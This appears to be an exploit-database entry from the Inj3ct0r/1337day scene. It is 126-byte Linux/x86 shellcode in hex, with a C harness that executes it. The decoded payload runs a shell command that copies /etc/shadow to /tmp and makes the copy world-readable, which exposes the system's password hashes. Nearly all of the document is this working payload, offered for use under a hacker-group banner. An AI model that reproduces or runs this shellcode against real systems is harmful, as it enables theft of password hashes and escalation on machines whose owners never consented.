126 bytes small Linux/x86 cp /etc/shadow /tmp && chmod 777 /tmp/shadow shellcode.
3281284185894711f02603966afa216e2b23233c3410d64c430071df5a8869c3
/*
# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# 0 _ __ __ __ 1
# 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
# 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
# 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
# 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
# 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
# 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
# 1 \ \____/ >> Exploit database separated by exploit 0
# 0 \/___/ type (local, remote, DoS, etc.) 1
# 1 1
# 0 [x] Official Website: http://www.1337day.com 0
# 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1
# 0 0
# 1 ========================================== 1
# 0 I'm Dark-Puzzle From Inj3ct0r TEAM 0
# 0 1
# 1 dark-puzzle[at]live[at]fr 0
# 0 ========================================== 1
# 1 White Hat 1
# 0 Independant Pentester 0
# 1 exploit coder/bug researcher 0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
Shellcode By DarkPuzzle
Title : Linux/x86 - cp /etc/shadow /tmp && chmod 777 /tmp/shadow - 126 bytes .
Author: Dark-Puzzle (Souhail Hammou)
Platform : Linux/x86 (32-bits)
Gr33tz to : Inj3ct0rs Team - SecurityFocus - PacketstormSecurity - Exploit-db .
*/
char darkcode[] = "\xeb\x30\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x36\x89\x76\x37\x8d\x5e\x08\x89\x5e\x3b\x8d\x5e\x0b\x89\x5e\x3f\x89\x46\x43\xb0\x0b\x89\xf3\x8d\x4e\x37\x8d\x56\x43\xcd\x80\x31\xdb\xb0\x01\xcd\x80\xe8\xcb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23\x63\x70\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77\x20\x2f\x74\x6d\x70\x20\x3b\x20\x63\x68\x6d\x6f\x64\x20\x37\x37\x37\x20\x2f\x74\x6d\x70\x2f\x73\x68\x61\x64\x6f\x77\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44\x44\x44";
int main (int argc, char **argv)
{
int (*dark) ();
dark = (int (*) ()) darkcode;
(int) (*dark) ();
}
/** DataSec Team **/